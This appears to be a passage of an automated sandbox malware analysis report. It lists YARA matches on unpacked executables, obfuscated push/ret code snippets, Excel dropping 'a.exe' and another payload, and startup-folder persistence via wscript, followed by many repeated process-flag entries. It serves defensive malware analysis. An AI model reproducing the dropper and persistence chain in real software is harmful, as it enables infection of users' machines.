Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\ProgramData\a.exe Code function: 1_2_00E640C1 push eax; retn 0004h 1_2_00E640C2
Source: C:\ProgramData\a.exe Code function: 1_2_00E642DB pushad ; ret 1_2_00E642DE
Source: C:\ProgramData\a.exe Code function: 1_2_00E64450 push 6C04C257h; ret 1_2_00E64455
Source: C:\ProgramData\a.exe Code function: 1_2_00E6450F push edi; retn 0004h 1_2_00E64512
Source: C:\ProgramData\a.exe Code function: 1_2_00E66940 push 9E4C04C2h; ret 1_2_00E66946
Source: C:\ProgramData\a.exe Code function: 1_2_00E66910 push 9C8C04C2h; ret 1_2_00E6691E
Source: C:\ProgramData\a.exe Code function: 1_2_00E6B168 pushfd ; retn 0004h 1_2_00E6B16A
Source: C:\ProgramData\a.exe Code function: 1_2_00E69C98 pushfd ; ret 1_2_00E69CA6
Source: C:\ProgramData\a.exe Code function: 1_2_00E6FF29 push esp; ret 1_2_00E6FF2E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0541EA3B push 8B0541EBh; retf 13_2_0541EA47
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06900998 pushad ; iretd 13_2_06901631
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_0690F6D2 push eax; iretd 13_2_0690F6D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_06E07F5B push esp; retf 13_2_06E07F5C

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\a.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\a.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the startup folder
Source: C:\Windows\SysWOW64\wscript.exe PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Jump to behavior
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\wscript.exe PE file moved: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
